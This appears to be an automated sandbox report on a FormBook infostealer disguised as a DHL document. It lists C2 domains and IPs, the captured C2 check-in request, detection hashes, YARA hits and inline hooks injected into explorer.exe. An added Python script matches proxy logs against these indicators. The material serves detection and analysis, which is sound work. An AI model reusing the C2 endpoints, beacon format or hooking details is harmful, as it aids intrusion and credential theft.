1.2.DHL DOC 3406506482.exe.33e0000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.DHL DOC 3406506482.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
www.wed8029.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.uenpb.xyz/q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN | 0% | Avira URL Cloud | safe
www.verdugofarms.com/q35x/ | 3% | Virustotal |
www.verdugofarms.com/q35x/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.uenpb.xyz | 1.32.255.152 | true | true | | unknown
www.wed8029.com | unknown | unknown | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.uenpb.xyz/q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN | true | Avira URL Cloud: safe | unknown
www.verdugofarms.com/q35x/ | true | 3% Virustotal; Avira URL Cloud: safe | low

            Contacted IPs

            Public

IP | Domain | Country | ASN | ASN Name | Malicious
1.32.255.152 | www.uenpb.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
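
To turn the Contacted Domains, URLs and IPs above into something a SOC can run, the added example below (not part of the report) loads those indicators and scans web-proxy log lines for them. The log format and the `SAMPLE_LOG` lines are constructed for the example, and matching the hosts without their leading "www." is an assumption, since the report only lists the www labels. A request to www.wed8029.com matches on the domain even though the report never resolved it, and a hit on the /q35x/ path alone is marked low confidence, because the report shows that same path on two different hosts and the path is the only thing tying them together.

```python
"""Check web-proxy log lines against the network indicators in this report.

Added example, not part of the Joe Sandbox report. The indicator values come
from the report's Contacted Domains / URLs / IPs tables; the log format and
SAMPLE_LOG lines are constructed. A bare host or IP match is high confidence;
a match only on the /q35x/ path is a weaker, secondary signal.
"""
from __future__ import annotations
from urllib.parse import urlsplit

REPORT_URLS = [
    "http://www.uenpb.xyz/q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHC"
    "JqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN",
    "http://www.verdugofarms.com/q35x/",
]
REPORT_DOMAINS = {"www.uenpb.xyz", "www.wed8029.com", "www.verdugofarms.com"}
REPORT_IPS = {"1.32.255.152"}


def build_indicators() -> dict:
    """Derive host, IP and URI-path indicators from the report's values.
    Hosts are also matched without a leading "www." (an assumption)."""
    hosts = set(REPORT_DOMAINS)
    paths = set()
    for u in REPORT_URLS:
        parts = urlsplit(u)
        hosts.add(parts.hostname)
        # keep the directory part, e.g. "/q35x/" from "/q35x/?a=b" or "/q35x/x.php"
        path = parts.path if parts.path.endswith("/") else parts.path.rsplit("/", 1)[0] + "/"
        if path and path != "/":
            paths.add(path)
    hosts |= {h[4:] for h in hosts if h.startswith("www.")}
    return {"hosts": hosts, "ips": set(REPORT_IPS), "paths": paths}


def match_request(url: str, ind: dict) -> list[str]:
    """Return the reasons a single request URL matches, strongest first."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in ind["ips"]:
        reasons.append(f"ip:{host}")
    elif host in ind["hosts"]:
        reasons.append(f"domain:{host}")
    for p in ind["paths"]:
        if parts.path.startswith(p):
            reasons.append(f"uri_path:{p}")
            break
    return reasons


def scan_log(lines: list[str], ind: dict | None = None) -> list[dict]:
    """Constructed log format: <timestamp> <client ip> <method> <url> <status>."""
    if ind is None:
        ind = build_indicators()
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        ts, client, method, url, _status = fields[:5]
        reasons = match_request(url, ind)
        if reasons:
            confidence = "high" if reasons[0].startswith(("ip:", "domain:")) else "low"
            hits.append({"time": ts, "client": client, "method": method, "url": url,
                         "reasons": reasons, "confidence": confidence})
    return hits


# Constructed log lines (not captured traffic); the query values are dummies.
SAMPLE_LOG = [
    "2021-12-02T18:55:01Z 192.168.2.15 GET http://www.uenpb.xyz/q35x/?1bL4BX=AAAA&TBZ8=BBBB 200",
    "2021-12-02T18:55:07Z 192.168.2.15 POST http://www.verdugofarms.com/q35x/ 404",
    "2021-12-02T18:55:12Z 192.168.2.20 GET http://1.32.255.152/q35x/?x=1 200",
    "2021-12-02T18:56:40Z 192.168.2.21 GET http://cdn.example.net/q35x/ 200",
    "2021-12-02T18:57:03Z 192.168.2.22 GET https://www.example.com/en-us/ 200",
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['time']} {h['client']} {h['method']} {h['url']} "
              f"[{h['confidence']}] {', '.join(h['reasons'])}")
```

The query string is deliberately not part of the match: the report's URL carries per-victim parameters, so a rule pinned to them would miss every other infection. Path-only hits are worth keeping as a pivot rather than an alert on their own.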

            Private

            IP
            192.168.2.1

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:532855
            Start date:02.12.2021
            Start time:18:53:41
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 10m 27s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:DHL DOC 3406506482.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@7/1@5/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 65.9% (good quality ratio 61.3%)
            • Quality average: 71.6%
            • Quality standard deviation: 30.8%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information

            Simulations

            Behavior and APIs

Time | Type | Description
18:54:37 | API Interceptor | 1x Sleep call for process: DHL DOC 3406506482.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

Match: BCPL-SGBGPNETGlobalASNSG

Associated Sample Name / URL | Detection | Context (IP)
t6rrqsi3Bp | malicious | 134.122.132.42
REQ. FOR QUOTATION.exe | malicious | 1.32.254.254
Ljm7n1QDZe | malicious | 134.122.144.26
dd#U5149.exe | malicious | 118.107.44.235
c6#U9891.exe | malicious | 118.107.44.235
f4#U6b7b.exe | malicious | 118.107.44.235
gOJtZzW63F.exe | malicious | 202.79.175.12
c85WWDlKf2.dll | malicious | 202.36.49.75
SecuriteInfo.com.Trojan.GenericKDZ.80412.21668.dll | malicious | 202.36.49.75
swift copy.exe | malicious | 1.32.254.254
TFEkbH3ag3 | malicious | 69.176.83.27
00#U4e0b.exe | malicious | 118.107.44.235
c6#U9891.exe | malicious | 202.79.171.220
#U56fd#U5916#U66b4#U5229#U884c#U4e1a#U5962#U9761#U751f#U6d3b#U8bb0#U5f55#U89c6#U9891.exe | malicious | 202.79.165.153
e6#U60c5.exe | malicious | 202.79.171.220
5b#U6655.exe | malicious | 69.176.89.208
52#U7eff.exe | malicious | 118.107.44.235
Payment Order.exe | malicious | 134.122.133.133
kA1GNOTJ2VgnL02.exe | malicious | 1.32.254.254
GB0O1NUtmJ | malicious | 137.220.211.75

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL DOC 3406506482.exe.log
            Process:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1310
            Entropy (8bit):5.345651901398759
            Encrypted:false
            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
            MD5:D918C6A765EDB90D2A227FE23A3FEC98
            SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
            SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
            SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.840952482967267
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:DHL DOC 3406506482.exe
            File size:692736
            MD5:896c3c7f309a479f0ab1a9d8693b130f
            SHA1:9ad094b6799fb6deea1d2c3704576db3353d70ae
            SHA256:6f35f7c071de6ed456c189e023daa27c5b0cd007d4fcddbb13316a82ada83abe
            SHA512:c094e97eb898870a466dbc0f981ec379298805e4f5a0c5fc55291575d19dc94face2615f9db04b602ab489bd7e8d66248fa4acea3cb44117dd2106c9d08cba1c
            SSDEEP:12288:h4dN+434/7u9SOQ1saJoOqqMY0hwCvO3m36HNYi+Kebigu80DfDhJXX:hU44W7oioLq+hhWm36E3bo8WfDb
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q(.a..............0.................. ........@.. ....................................@................................

            File Icon

            Icon Hash:00828e8e8686b000

            Static PE Info

            General

            Entrypoint:0x4aa582
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x61A82851 [Thu Dec 2 01:58:41 2021 UTC]
            TLS Callbacks:
            CLR (.Net) Version:v4.0.30319
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al   (repeated 97 times: the bytes after the six-byte jmp stub are zero padding, and each pair of 00 bytes disassembles as this instruction)

            Data Directories

            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaa530 | 0x4f | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x618 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x2000 | 0xa8588 | 0xa8600 | False | 0.915302234131 | data | 7.85043153763 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rsrc | 0xac000 | 0x618 | 0x800 | False | 0.3408203125 | data | 3.46786443123 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0xae000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            Name | RVA | Size | Type | Language | Country
            RT_VERSION | 0xac090 | 0x388 | data | |
            RT_MANIFEST | 0xac428 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

            Imports

            DLL | Import
            mscoree.dll | _CorExeMain

            Version Infos

            Description | Data
            Translation | 0x0000 0x04b0
            LegalCopyright | Copyright Mogens Heller Grabe 2010
            Assembly Version | 1.0.0.0
            InternalName | SymLanguageTy.exe
            FileVersion | 1.0.0.0
            CompanyName | Mookid8000
            LegalTrademarks |
            Comments |
            ProductName | TypedFactoryTjek
            ProductVersion | 1.0.0.0
            FileDescription | TypedFactoryTjek
            OriginalFilename | SymLanguageTy.exe

            Network Behavior

            Snort IDS Alerts

            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
            12/02/21-18:56:18.995145 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
            12/02/21-18:56:20.025625 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
            12/02/21-18:56:22.026347 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
            12/02/21-18:56:34.770599 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            12/02/21-18:56:34.770599 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            12/02/21-18:56:34.770599 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 1.32.255.152

            Network Port Distribution

            TCP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Dec 2, 2021 18:56:34.515832901 CET | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            Dec 2, 2021 18:56:34.770051956 CET | 80 | 49808 | 1.32.255.152 | 192.168.2.5
            Dec 2, 2021 18:56:34.770373106 CET | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            Dec 2, 2021 18:56:34.770598888 CET | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            Dec 2, 2021 18:56:35.024621010 CET | 80 | 49808 | 1.32.255.152 | 192.168.2.5
            Dec 2, 2021 18:56:35.024651051 CET | 80 | 49808 | 1.32.255.152 | 192.168.2.5
            Dec 2, 2021 18:56:35.024684906 CET | 80 | 49808 | 1.32.255.152 | 192.168.2.5
            Dec 2, 2021 18:56:35.024945021 CET | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            Dec 2, 2021 18:56:35.025039911 CET | 49808 | 80 | 192.168.2.5 | 1.32.255.152
            Dec 2, 2021 18:56:35.279233932 CET | 80 | 49808 | 1.32.255.152 | 192.168.2.5

            UDP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Dec 2, 2021 18:56:12.963686943 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
            Dec 2, 2021 18:56:13.975543022 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
            Dec 2, 2021 18:56:15.006789923 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
            Dec 2, 2021 18:56:17.007019997 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
            Dec 2, 2021 18:56:17.983330965 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
            Dec 2, 2021 18:56:18.995060921 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
            Dec 2, 2021 18:56:20.025499105 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
            Dec 2, 2021 18:56:22.026230097 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
            Dec 2, 2021 18:56:34.172086954 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
            Dec 2, 2021 18:56:34.510354042 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5

            ICMP Packets

            Timestamp | Source IP | Dest IP | Checksum | Code | Type
            Dec 2, 2021 18:56:18.995145082 CET | 192.168.2.5 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
            Dec 2, 2021 18:56:20.025624990 CET | 192.168.2.5 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
            Dec 2, 2021 18:56:22.026346922 CET | 192.168.2.5 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Dec 2, 2021 18:56:12.963686943 CET | 192.168.2.5 | 8.8.8.8 | 0x60c6 | Standard query (0) | www.wed8029.com | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:13.975543022 CET | 192.168.2.5 | 8.8.8.8 | 0x60c6 | Standard query (0) | www.wed8029.com | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:15.006789923 CET | 192.168.2.5 | 8.8.8.8 | 0x60c6 | Standard query (0) | www.wed8029.com | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:17.007019997 CET | 192.168.2.5 | 8.8.8.8 | 0x60c6 | Standard query (0) | www.wed8029.com | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:34.172086954 CET | 192.168.2.5 | 8.8.8.8 | 0x1ecf | Standard query (0) | www.uenpb.xyz | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Dec 2, 2021 18:56:17.983330965 CET | 8.8.8.8 | 192.168.2.5 | 0x60c6 | Server failure (2) | www.wed8029.com | none | none | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:18.995060921 CET | 8.8.8.8 | 192.168.2.5 | 0x60c6 | Server failure (2) | www.wed8029.com | none | none | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:20.025499105 CET | 8.8.8.8 | 192.168.2.5 | 0x60c6 | Server failure (2) | www.wed8029.com | none | none | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:22.026230097 CET | 8.8.8.8 | 192.168.2.5 | 0x60c6 | Server failure (2) | www.wed8029.com | none | none | A (IP address) | IN (0x0001)
            Dec 2, 2021 18:56:34.510354042 CET | 8.8.8.8 | 192.168.2.5 | 0x1ecf | No error (0) | www.uenpb.xyz | | 1.32.255.152 | A (IP address) | IN (0x0001)

            HTTP Request Dependency Graph

            • www.uenpb.xyz

            HTTP Packets

            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.5 | 49808 | 1.32.255.152 | 80 | C:\Windows\explorer.exe

            Timestamp | kBytes transferred | Direction | Data
            Dec 2, 2021 18:56:34.770598888 CET | 16140 | OUT | GET /q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN HTTP/1.1
                Host: www.uenpb.xyz
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
            Dec 2, 2021 18:56:35.024651051 CET | 16140 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 02 Dec 2021 17:56:34 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

            Code Manipulations

            User Modules

            Hook Summary

            Function Name | Hook Type | Active in Processes
            PeekMessageA | INLINE | explorer.exe
            PeekMessageW | INLINE | explorer.exe
            GetMessageW | INLINE | explorer.exe
            GetMessageA | INLINE | explorer.exe

            Processes

            Process: explorer.exe, Module: user32.dll
            Function Name | Hook Type | New Data
            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE6
            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE6
            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE6
            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE6

            Statistics

            Behavior


            System Behavior

            General

            Start time:18:54:36
            Start date:02/12/2021
            Path:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\DHL DOC 3406506482.exe"
            Imagebase:0x3b0000
            File size:692736 bytes
            MD5 hash:896C3C7F309A479F0AB1A9D8693B130F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            General

            Start time:18:54:38
            Start date:02/12/2021
            Path:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\DHL DOC 3406506482.exe
            Imagebase:0x490000
            File size:692736 bytes
            MD5 hash:896C3C7F309A479F0AB1A9D8693B130F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            General

            Start time:18:54:42
            Start date:02/12/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            General

            Start time:18:55:08
            Start date:02/12/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x290000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
